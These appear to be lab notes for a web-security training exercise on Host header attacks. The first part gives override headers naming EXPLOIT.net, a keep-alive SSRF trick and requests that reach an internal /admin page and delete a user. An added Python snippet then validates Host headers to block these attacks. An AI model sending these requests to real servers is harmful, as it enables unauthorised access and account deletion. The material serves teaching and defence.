#use one of these
X-Forwarded-Host: EXPLOIT.net
X-Host: EXPLOIT.net
X-Forwarded-Server: EXPLOIT.net
Sending grouped requests in sequence over a single connection, with the Connection header set to keep-alive, bypasses Host header validation and enables an SSRF exploit against the local server.
Try to reach the admin page through localhost or a LAN IP. A Collaborator request will confirm that an out-of-band resource can be reached.
#Full path in request
GET / or https://YOUR-LAB-ID.web-security-academy.net/
Host: BURP-COLLABORATOR-SUBDOMAIN or 192.168.0.$$
#then try to guess the IP with Intruder, request /admin to get the CSRF token, and then perform the action
GET /admin
Host: 192.168.0.17
GET /admin/delete?csrf=jslsjf&username=carlos
Host: 192.168.0.17
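
#Defensive check (added example, not part of the original notes)
A front-end check that closes the three gaps above: it validates the Host header on every request of a keep-alive connection, rejects the override headers, and requires an absolute URL in the request line to agree with Host. The hostname shop.example.com, the function names and the sample connection are assumptions constructed for illustration.

```python
ALLOWED_HOSTS = {"shop.example.com"}  # assumed public hostname (constructed)
OVERRIDE_HEADERS = ("x-forwarded-host", "x-host", "x-forwarded-server")


def _hostname(value):
    """Lower-cased hostname without port; '' if userinfo is present."""
    value = value.strip().lower()
    if "@" in value:
        return ""
    # Drop a trailing :port (bracketed IPv6 literals are out of scope here).
    return value.rsplit(":", 1)[0] if ":" in value else value


def check_request(request_line, headers):
    """Return (ok, reason) for one parsed request; headers is a list of pairs."""
    parts = request_line.split()
    names = [name.lower() for name, _ in headers]
    if len(parts) != 3 or names.count("host") != 1:
        return False, "malformed request or missing/duplicate Host"
    host = _hostname(headers[names.index("host")][1])
    if host not in ALLOWED_HOSTS:
        return False, "Host not in allow-list"
    # Policy assumed here: clients never legitimately send these headers.
    for name in OVERRIDE_HEADERS:
        if name in names:
            return False, "override header " + name
    # An absolute-form target must name the same host as the Host header.
    target = parts[1]
    if not target.startswith("/") and "://" in target:
        netloc = target.split("://", 1)[1].split("/", 1)[0]
        if _hostname(netloc) != host:
            return False, "absolute URL disagrees with Host"
    return True, "ok"


def check_connection(requests):
    """Validate every request on a keep-alive connection, not just the first."""
    return [check_request(line, headers) for line, headers in requests]


# Constructed sample: two requests reusing one connection.
SAMPLE_CONNECTION = [
    ("GET / HTTP/1.1", [("Host", "shop.example.com"), ("Connection", "keep-alive")]),
    ("GET /admin HTTP/1.1", [("Host", "192.168.0.17")]),
]

if __name__ == "__main__":
    for ok, reason in check_connection(SAMPLE_CONNECTION):
        print("accept" if ok else "reject", "-", reason)
```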